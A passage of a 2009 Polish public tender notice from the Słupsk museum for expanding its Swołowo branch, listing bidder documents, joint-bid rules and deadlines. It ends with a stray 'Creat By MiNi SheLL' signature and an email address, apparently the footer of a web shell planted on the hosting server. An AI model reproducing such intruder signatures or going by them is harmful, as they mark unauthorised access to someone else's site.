- wezwie Wykonawców, w wyznaczonym przez siebie terminie, do złożenia wyjaśnień dotyczących oświadczeń i dokumentów, o których mowa w art. 25 ust.1 ustawy Pzp..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.Dla potwierdzenia spełnienia warunków ogólnych Wykonawcy winni przedłożyć niżej wymienione dokumenty:
1.1. Oświadczenie o spełnianiu warunków udziału w postępowaniu na formularzu zgodnym z treścią oświadczenia zamieszczonego w SIWZ (w przypadku wspólnego ubiegania się dwóch lub więcej wykonawców o udzielenie niniejszego  zamówienia - oświadczenie składa ten lub ci z wykonawców, którzy w imieniu wszystkich wykazywać będą spełnienie tego warunku) - załącznik Nr 2 do SIWZ,  złożone w oryginale oraz oświadczenie o nie podleganiu wykluczeniu z postępowania na podstawie art. 24 ustawy Pzp na formularzu zgodnym z treścią oświadczenia zamieszczonego w SIWZ (w przypadku wspólnego ubiegania się o zamówienie przez dwóch lub więcej wykonawców do oferty należy załączyć przedmiotowe oświadczenie złożone przez każdego z nich) - załącznik Nr 3 do SIWZ złożone w oryginale.
1.2. Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert (w przypadku wspólnego ubiegania się o zamówienie przez dwóch lub więcej wykonawców do oferty należy załączyć przedmiotowe zaświadczenie złożone przez każdego z nich).
1.3. Umowa spółki cywilnej, jeżeli działalność prowadzona jest w takiej formie.
1.4. Zaświadczenie z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt. 9 ustawy Prawo Zamówień Publicznych, wystawione nie wcześniej niż 6 m-cy  przed upływem terminu składania ofert.
1.5. Zaświadczenie z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust.1 pkt. 4-8 ustawy Prawo Zamówień Publicznych (dotyczy podmiotu zbiorowego), wystawione  nie wcześniej niż 6 m-cy przed upływem terminu składania ofert.
1.6. Zaświadczenie właściwego Urzędu Skarbowego potwierdzające odpowiednio, że wykonawca nie  zalega z opłacaniem podatków lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionych nie wcześniej niż 3 miesiące przed upływem terminu    
składania ofert.
1.6. Aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne lub społeczne, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
1.7. Wykaz robót budowlanych, sporządzony wg wzoru załącznika Nr 4 do SIWZ , z
podaniem ich wartości oraz daty wykonania, wykonanych w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielnie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, na obiektach zabytkowych, wpisanych do rejestru zabytków, o charakterze, wielkości oraz wartości  odpowiadającym przedmiotowi niniejszego zamówienia, w tym jednej roboty budowlanej w obiektach zabytkowych, wpisanych do rejestru zabytków o drewnianej konstrukcji szkieletowej , z tradycyjnym wypełnieniem ścian w technologii szachulcowej. Do wykazu Wykonawcy zobowiązani są dołączyć aktualne referencje, wydane przez zamawiających potwierdzające, że zamówienia wymienione w wykazie zostały wykonane  należycie.  
1.8. Informację o przeciętnej liczbie zatrudnionych pracowników oraz liczbie personelu kierowniczego w okresie ostatnich trzech lat, w przypadku gdy okres prowadzenia działalności jest krótszy - w tym okresie, 
1.9. Sprawozdanie finansowe za lata 2006, 2007, 2008, a jeżeli podlega ono badaniu przez biegłego rewidenta zgodnie z przepisami o rachunkowości również z opinią odpowiednio o badanym sprawozdaniu, a w przypadku wykonawców nie zobowiązanych do sporządzenia sprawozdania finansowego, innych dokumentów określających obroty, zobowiązania oraz należności, a jeżeli okres prowadzenia działalności jest krótszy - za ten okres. Za I kwartał roku bieżącego - 2009,  Wykonawca zobowiązany jest przedstawić sprawozdanie na druku F-01 oraz deklarację rozliczeniową podatku dochodowego CIT -2 lub PIT-5. Wykonawca winien wykazać się dodatnim wynikiem finansowym we wszystkich badanych latach. Wykonawca winien wykazać się w roku 2008 obrotem netto w wysokości minimum 4 mln zł. 
1.10. Przedstawienie polisy lub innego dokumentu ubezpieczenia  potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej     na kwotę nie mniejszą, o której mowa w pkt. 7.6.1 b) SIWZ. Okres ubezpieczenia   powinien obejmować co najmniej dzień złożenia oferty, a w przypadku wyboru oferty  ubezpieczenie powinno obejmować cały czas trwania robót ( w przypadku wspólnego ubiegania się dwóch lub  więcej wykonawców o udzielenie niniejszego zamówienia, ocenie podlegać będzie dokument złożony przez tego lub tych wykonawców, którzy w imieniu wszystkich wykazywać będą jego spełnienie).
1.11. Informację z banku, w którym wykonawca na rachunku potwierdzi możliwość dysponowania środkami finansowymi w kwocie nie mniejszej niż 40% zaproponowanej w ofercie wykonawcy ceny (w przypadku wspólnego ubiegania się dwóch lub więcej wykonawców o udzielenie niniejszego zamówienia, ocenie podlegać będzie dokument złożony przez tego lub tych wykonawców, którzy w imieniu wszystkich wykazywać będą jego spełnienie).
1.12. Zamawiający wymaga wskazania przez wykonawcę w ofercie tych części zamówienia, których wykonanie zamierza powierzyć podwykonawcom (wg wzoru zał. nr 6) wraz z informacjami na temat ich kwalifikacji niezbędnych do wykonania zamówienia. Do niniejszego wykazu należy dołączyć oświadczenie podwykonawcy potwierdzające gotowość wykonania określonego zakresu robót.
1.13. Wykaz osób (kadry technicznej),  (wg wzoru zał. Nr5 do SIWZ), które będą wykonywać zamówienie lub będą uczestniczyć  w wykonywaniu zamówienia, ze szczególnym uwzględnieniem osób z uprawnieniami budowlanymi, sanitarnymi i elektrycznymi wraz z informacjami na temat ich kwalifikacji niezbędnych do wykonania zamówienia, uprawnień budowlanych, doświadczenia zawodowego, a także zakresu wykonywanych przez nich czynności. Do wykazu należy dołączyć kserokopie dokumentów potwierdzające spełnienie warunków, o których mowa w pkt. 7.6.2 SIWZ oraz, że osoba kierująca wykonaniem zamówienia posiada wymagane uprawnienia budowlane:
- decyzję o nadaniu uprawnień,
- aktualne zaświadczenie o wpisie na listę członków właściwej izby samorządu zawodowego (w przypadku wspólnego ubiegania się o zamówienie przez dwóch lub więcej wykonawców ocenia podlegać będzie wspólny potencjał kadrowy oraz łączne kwalifikacje),
- zaświadczenie o posiadaniu kwalifikacji w zakresie nadzoru nad pracami budowlanymi przy zabytkowych obiektach architektury, zgodnie z § 8 ust.3 Rozporządzenia Ministra Kultury z dnia 9.06.2004r., w sprawie prowadzenia prac konserwatorskich, restauratorskich, robót budowlanych, badań konserwatorskich i architektonicznych, a także innych działań przy zabytku wpisanym do rejestru zabytków oraz badań archeologicznych i poszukiwań ukrytych lub porzuconych zabytków ruchomych (Dz.U. Nr 150 z 2004r., poz. 1579).
1.14. Pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do
wykonania zamówienia, jeżeli w wykazie sporządzonym wg załącznika nr 5 do SIWZ
Wykonawca wskazał osoby, którymi będzie dysponował.
1.15. Ponadto wykonawca składa.
1.15.1. Wypełniony  formularz oferty (załącznik nr 1 do SIWZ w oryginale) zawierający oferowaną cenę wraz z oświadczeniami:
- Oświadczenie o zgodności przedmiotu oferty z przedmiotem zamówienia.
- Oświadczenie o udzieleniu rękojmi na okres co najmniej 36 miesięcy i gwarancji na okres co najmniej 36 miesięcy, na wykonany przedmiot zamówienia.
- Oświadczenie o przyjęciu projektu umowy stanowiącej integralną część specyfikacji istotnych warunków zamówienia bez   zastrzeżeń. 
1.15.2. Dowód wniesienia wadium (oryginał  dołączony do oferty) w wysokości i      formie akceptowalnej przez Zamawiającego.
1.15.3. Szczegółowy kosztorys ofertowy, będący dla Zamawiającego materiałem pomocniczym, wykonany na podstawie przedmiarów robót i specyfikacji technicznej wykonania i odbioru robót budowlanych.
1.15.4. Harmonogram rzeczowo-finansowy realizacji zadania. 
1.15.5. Dokument ustanawiający Pełnomocnika do reprezentowania wykonawców wspólnie ubiegających się o udzielenie zamówienia, do reprezentowania w postępowaniu i zawarcia umowy w sprawie niniejszego zamówienia publicznego- w przypadku wykonawców składających wspólna ofertę , a podpisywana jest przez pełnomocnika;
1.15.6. Stosowne pełnomocnictwo - w przypadku, gdy upoważnienie do podpisania oferty nie wynika bezpośrednio z zaświadczenia o wpisie do właściwego rejestru albo zaświadczenia o wpisie do ewidencji działalności gospodarczej.
1.16. Dokumenty są składane w formie oryginału lub kopii poświadczonej ZA ZGODNOŚC Z ORYGINAŁEM przez Wykonawcę, jeżeli należy złożyć je w  oryginale lub poświadczonej przez notariusza kopii. Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski, poświadczonym, jak wyżej - przez wykonawcę.
1.17. Jeżeli termin składania ofert ulegnie przesunięciu, wówczas dokumenty, które do tego czasu utraciły swą ważność, należy zaktualizować.
2. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia (spółka cywilna, konsorcjum)
2.1. Wykonawcy mogą wspólnie ubiegać się o udzielnie zamówienia (spółka cywilna, konsorcjum) - art. 23 ust.1 ustawy Pzp. W takim przypadku Wykonawcy ponoszą solidarną odpowiedzialność za wykonanie umowy i wniesienie zabezpieczenia należy tego wykonania umowy (art.141 ustawy Pzp).
2.2. W przypadku składania oferty przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia, Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia i zawarcia umowy w sprawie zamówienia publicznego oraz załączają do oferty - pełnomocnictwo do reprezentowania Wykonawców w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.
2.3. Każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia, zobowiązany jest złożyć samodzielnie - oświadczenie oraz dokumenty wymienione w pkt. 8.1.1. - 8.1.6. 
2.4. Wszyscy Wykonawcy ubiegający się wspólnie o udzielenie zamówienia, powinni złożyć jako jeden,     wspólny dla nich wszystkich, dokument wymieniony w pkt. 8.1.7.  - 8.1.15. SIWZ.
2.5. Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, stosownie do treści stosowanie do treści § 2 rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006r. w sprawie rodzaju dokumentów jakich żądać może zamawiający od wykonawców oraz form w jakich dokumenty te mogą być składane (Dz.U. Nr 87 z 2006r., poz. 605 ze mianami) zamiast dokumentów, o których mowa w pkt. 8.1.2. do 8.1.6. składa dokument lub dokumenty, wystawione w kraju,  w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio że:
-nie otwarto jego likwidacji ani nie ogłoszono upadłości;
-nie orzeczono wobec niego zakazu ubiegania się o zamówienie
-nie zalega z uiszczaniem podatków, opłat lub składek na ubezpieczenie społeczne lub zdrowotne albo że uzyskał przewidziane prawem zwolnienie odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu.
-składa zaświadczenie właściwego organu sądowego lub administracyjnego kraju pochodzenia albo zamieszkania osoby, której dokumenty te dotyczą, w zakresie określonym w art. 24 ust.1 pkt. 4-8 ustawy Pzp.
2.6. Dokument ten powinien być wystawiony nie wcześniej niż 6 m-cy przed upływem terminu do składania ofert.
2.7. Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się wyżej wymaganych dokumentów, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania. 
2.8. Dokumenty określone w pkt 8.2.5. winny być złożone w formie oryginału lub kserokopii wraz z tłumaczeniem na język polski, poświadczonym przez Wykonawcę; kserokopie muszą być   poświadczone za zgodność z oryginałem przez Wykonawcę..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.muzeum.slupsk.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Muzeum Pomorza Środkowego w Słupsku
ul. Dominikańska 5-9
76-200 Słupsk
Pokój nr 7(sekretariat) - koszt 250 zł.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.07.2009 godzina 10:00, miejsce: Muzeum Pomorza Środkowego w Słupsku
ul. Dominikańska 5-9
76-200 Słupsk
Pokój nr 7(sekretariat).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt nr WND-RPPM.06.03.00-00-019/08 Wzmocnienie potencjału Pomorskiej Krainy w Kratę - etap II - rozbudowa filii MPŚ w Swołowie objęty wsparciem w ramach Regionalnego Programu Operacyjnego Województwa Pomorskiego na lata 2007 - 2013 - Oś Priorytetowa 6, działanie 6.3.

Creat By MiNi SheLL
Email: jattceo@gmail.com